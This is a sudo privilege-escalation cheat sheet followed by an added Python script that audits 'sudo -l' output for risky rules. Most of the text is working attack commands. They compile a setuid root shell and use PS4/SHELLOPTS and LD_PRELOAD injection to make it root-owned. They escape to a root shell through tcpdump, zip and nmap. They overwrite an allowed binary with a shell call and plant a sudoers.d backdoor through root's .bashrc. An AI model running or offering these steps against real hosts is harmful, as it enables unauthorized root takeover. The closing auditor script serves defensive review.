First check which commands you are allowed to run and how sudo handles your environment with
sudo -l
Then check the permissions on the files you are allowed to run and on the directories that contain them.
If you can modify the file, you already know what to do. If the directory is world-writable, remove the file and replace it with a link from that name to your own code.
If the environment is inherited from the user (sudo -l shows !env_reset, an env_keep entry for the variable, or a SETENV tag; by default sudo strips LD_*, SHELLOPTS, PS4, PERL5OPT and PYTHONINSPECT), set PS4, LD_PRELOAD, PERL5OPT, PYTHONINSPECT etc.
PS4 (bash expands it, command substitutions included, before every traced line of a script; setenv is csh syntax, use export in bash)
printf '#include <unistd.h>\nint main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", (char *)0); return 0; }\n' | gcc -x c -o egg -
setenv SHELLOPTS xtrace
setenv PS4 '$(chown 0:0 egg)'
sudo ./command
setenv PS4 '$(chmod +xs egg)'
sudo ./command
./egg
LD_PRELOAD
printf '#include <unistd.h>\nint main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", (char *)0); return 0; }\n' | gcc -x c -o /tmp/egg -
printf '#include <unistd.h>\n#include <stdlib.h>\nvoid _init(void) { if (!geteuid()) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); execl("/bin/sh", "sh", "-c", "chown 0:0 /tmp/egg; /bin/chmod +xs /tmp/egg", (char *)0); } }\n' | gcc -c -x c -fPIC -o preloader.o -
gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 preloader.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 command
Otherwise look for a way to run a custom script from the allowed command. Examples:
tcpdump (-z runs a post-rotate command, as the user given by -Z)
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z shell.sh -Z root
zip (-TT replaces the archive test command used by -T)
sudo zip -U in.zip -O out.zip -T -TT '/bin/bash #'
nmap (--script runs an NSE Lua script)
echo "os.execute('/bin/sh')" > shell.lua
sudo /usr/bin/nmap --script shell.lua
Look for interactive commands and see if you can escape to a shell from them (! runs a shell command from vi or less) or overwrite/change the files they use.
For example, older nmap versions have an --interactive option from which a shell can be reached.
Another option is to use the command's file output to overwrite the file itself with your custom script. Back up first, run the shell, and clean up afterwards (-log stands for whatever output option the command offers):
cp command /tmp/command.bak
sudo command -log command "; /bin/bash; cat /tmp/command.bak > command"
The last option is to try an option that writes to a file. Softlink that file to root's .bashrc, add a command that gets you root, and wait for root to log in. As the value that gets written:
"$(echo -e "\necho 'me ALL=(ALL) ALL' > /etc/sudoers.d/getroot ")"
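The same conditions from the auditor's side: a small Python script, added here and not part of the original cheat sheet, that parses the text printed by sudo -l and flags what this page relies on (environment passed through via !env_reset, env_keep or SETENV, unrestricted ALL rules, and allowed commands such as tcpdump, zip, nmap, vi or less that can run a caller-supplied script). The function name audit_sudo_l, the RISKY_ENV and SCRIPT_RUNNERS lists and the sample sudo -l output are mine; the sample is constructed, not taken from a real host.

```python
import os
import re

# Variables this cheat sheet abuses if sudo passes them through to the command
RISKY_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PS4", "SHELLOPTS",
             "PERL5OPT", "PYTHONINSPECT", "PYTHONPATH"}
# Allowed commands that can run a caller-supplied script or drop to a shell
SCRIPT_RUNNERS = {"tcpdump", "zip", "nmap", "vi", "vim", "less", "more", "find"}
# One rule line of sudo -l output: "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

def audit_sudo_l(text):
    """Return a list of findings for the given sudo -l text; empty means nothing risky."""
    findings, defaults, in_rules = [], [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True            # everything after this header is a rule
        elif not in_rules:
            defaults.append(line)      # Defaults section: env_reset, env_keep, ...
        elif (m := RULE_RE.match(line)):
            tags, cmd = m.group("tags"), m.group("cmd")
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append("unrestricted rule: " + line.strip())
            if "SETENV:" in tags:
                findings.append("SETENV lets the caller set LD_PRELOAD/PS4 for " + cmd)
            if prog in SCRIPT_RUNNERS:
                findings.append(prog + " can run a caller-supplied script: " + cmd)
    defaults_text = "\n".join(defaults)
    if "!env_reset" in defaults_text:
        findings.append("env_reset is disabled: the caller's environment is inherited")
    kept = set()   # variables listed in env_keep, quoted or single unquoted name
    for m in re.finditer(r'env_keep\+?=(?:"([^"]*)"|([^\s,]+))', defaults_text):
        kept.update((m.group(1) or m.group(2) or "").split())
    risky = sorted(kept & RISKY_ENV)
    if risky:
        findings.append("env_keep passes through: " + ", ".join(risky))
    return findings

# Constructed sample of sudo -l output (not from a real host)
SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, env_keep+="LD_PRELOAD PS4 SHELLOPTS", mail_badpass

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/sbin/tcpdump
    (root) SETENV: /usr/bin/zip
    (ALL) /usr/bin/nmap
    (root) /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    print(*audit_sudo_l(SAMPLE), sep="\n")
```

Run it on real output with `sudo -l | python3 audit.py` after swapping SAMPLE for `sys.stdin.read()`; a rule that the script does not flag still deserves a look if the binary or its directory is writable.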